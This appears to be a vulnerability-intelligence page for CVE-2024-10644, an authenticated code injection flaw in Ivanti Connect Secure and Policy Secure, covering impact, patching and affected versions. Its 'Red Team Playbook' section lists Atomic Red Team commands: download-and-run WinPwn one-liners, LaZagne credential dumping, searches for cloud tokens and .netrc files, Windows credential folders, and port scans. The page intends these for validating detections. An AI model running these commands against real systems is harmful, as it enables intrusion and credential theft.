CVE-2024-10644
Overview
This vulnerability is a code injection flaw rooted in improper input validation within Ivanti Connect Secure and Ivanti Policy Secure. The affected components fail to adequately sanitize administrator-supplied input, allowing crafted commands to be injected and executed. The flaw specifically impacts versions prior to 22.7R2.4 for Connect Secure and 22.7R1.3 for Policy Secure, compromising the administrative interface's command handling mechanisms.
Vulnerability Description
Code injection in Ivanti Connect Secure before version 22.7R2.4 and Ivanti Policy Secure before version 22.7R1.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
Impact
An attacker with valid administrative credentials can execute arbitrary code remotely on the affected systems, resulting in full compromise of the Ivanti Connect Secure or Policy Secure appliance. This requires prior authentication with high privileges and network access to the management interface. Successful exploitation can lead to unauthorized control over the device, data exfiltration, disruption of secure access services, and potential lateral movement within the network. The CVSS vector (AV:N/AC:L/PR:H/UI:N) confirms remote network attack with high privileges and no user interaction is needed.
Solution
Ivanti has released patches addressing this vulnerability in Connect Secure version 22.7R2.4 and Policy Secure version 22.7R1.3. Administrators should apply these updates promptly as detailed in the Ivanti February Security Advisory available at https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs. No alternative mitigations are specified; updating to the fixed versions is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Ivanti Connect Secure and Ivanti Policy Secure is characterized by a code injection flaw that allows remote authenticated attackers with administrative privileges to execute arbitrary code on the affected systems. This type of vulnerability typically arises from improper validation of user input, which can lead to the execution of malicious scripts or commands. In this case, the flaw exists in versions prior to 22.7R2.4 for Connect Secure and 22.7R1.3 for Policy Secure. Attackers exploiting this vulnerability can manipulate the system's behavior, potentially leading to unauthorized access to sensitive data or complete system compromise.
Attack vectors for this vulnerability primarily involve authenticated users leveraging their administrative privileges to inject malicious code. Once an attacker gains access to the administrative interface, they can exploit the code injection flaw to execute commands on the server. This could be achieved through various means, such as crafting malicious requests or manipulating existing functionalities within the application. The ability to execute arbitrary code remotely poses a significant threat, as it can allow attackers to install malware, exfiltrate data, or pivot to other systems within the network.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely on Ivanti's solutions for secure access and policy enforcement. Successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential regulatory penalties. The ability to execute arbitrary code could also enable attackers to disrupt services, leading to downtime and financial losses. Organizations that fail to address this vulnerability may find themselves at a heightened risk of targeted attacks, especially if they are in industries that handle sensitive information.
To detect and mitigate the risk associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the system before they can be exploited. Additionally, keeping software up to date is crucial; organizations should prioritize applying patches and updates provided by Ivanti to mitigate the risk of exploitation. Monitoring logs for unusual activity, particularly from authenticated users, can also provide early warning signs of attempted exploitation. Furthermore, implementing strict access controls and ensuring that administrative privileges are granted only to necessary personnel can help limit the attack surface.
In conclusion, the code injection vulnerability in Ivanti Connect Secure and Policy Secure represents a significant threat to organizations utilizing these products. The potential for remote code execution by authenticated attackers underscores the importance of maintaining robust security practices, including timely updates, vigilant monitoring, and strict access controls. By adopting a proactive security posture, organizations can better protect themselves against the risks posed by such vulnerabilities and safeguard their critical assets.
Affected Products (17)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2.3:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | All |
cpe:2.3:a:ivanti:policy_secure:*:-:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1.1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10644 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs |